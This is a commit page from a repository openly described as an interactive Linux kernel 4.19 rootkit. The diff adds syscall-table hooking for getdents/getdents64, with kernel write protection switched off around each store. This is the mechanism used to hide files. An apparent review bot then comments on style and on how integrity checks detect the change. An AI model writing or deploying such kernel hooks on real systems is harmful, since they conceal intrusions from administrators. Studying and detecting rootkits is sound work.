linux-rootkit

Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)
git clone git://git.deurzen.net/linux-rootkit

commit 65f046cb1484a53d0406eeb5c5d1b91a1e0a15cb
parent c0f6c3f9d116a5e13d53b219404f856d663cea4b
Author: deurzen <m.deurzen@tum.de>
Date:   Sat, 21 Nov 2020 15:30:18 +0100

refactors code

Diffstat:
Msrc/filehide.c | 8++++++--
Msrc/hook.c | 4++--
2 files changed, 8 insertions(+), 4 deletions(-)

diff --git a/src/filehide.c b/src/filehide.c
@@ -4,25 +4,29 @@
 long g7_getdents(unsigned fd, struct linux_dirent __user *dirp, unsigned count)
 {
-
+ return sys_getdents(fd, dirp, count);
 }
 long g7_getdents64(unsigned fd, struct linux_dirent64 __user *dirp, unsigned count)
 {
-
+ return sys_getdents64(fd, dirp, count);
 }
 void hide_files(void)
 {
+ disable_protection();
 sys_call_table[__NR_getdents] = (long *)g7_getdents;
 sys_call_table[__NR_getdents64] = (long *)g7_getdents64;
+ enable_protection();
 }
 void unhide_files(void)
 {
+ disable_protection();
 sys_call_table[__NR_getdents] = (long *)sys_getdents;
 sys_call_table[__NR_getdents64] = (long *)sys_getdents64;
+ enable_protection();
 }
diff --git a/src/hook.c b/src/hook.c
@@ -21,8 +21,8 @@
 init_hooks(void)
 {
 disable_protection();
- sys_getdents = (void *)sys_call_table[__NR_getdents];
- sys_getdents64 = (void *)sys_call_table[__NR_getdents64];
+ sys_getdents = (void *)sys_call_table[__NR_getdents];
+ sys_getdents64 = (void *)sys_call_table[__NR_getdents64];
 enable_protection();
 }
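Review bot: The `disable_protection()`/`enable_protection()` pairs added to `hide_files` and `unhide_files` carry no comment stating what they bracket, and the new `return sys_getdents(fd, dirp, count);` / `return sys_getdents64(fd, dirp, count);` lines turn `g7_getdents`/`g7_getdents64` into bare pass-through wrappers without saying so; both deserve a line of documentation in this file. I would put `/* sys_call_table is write-protected: every store to it is bracketed by disable_protection()/enable_protection() */` above `hide_files` and `/* pass-through wrapper; the original handler it forwards to is saved by init_hooks() in hook.c */` above `g7_getdents`. As a point of style, `(long *)g7_getdents` converts a function pointer to an object pointer, which is only conditionally supported in C; the read side in hook.c already uses `(void *)`, and the two files should agree on one spelling. From the analysis side these two table stores are the observable event: `sys_call_table` slots that no longer point into the kernel's own text are what the repository's GDB introspection plugin, or any syscall-table integrity check, would surface. The hook.c hunk in this commit is whitespace-only and needs no change.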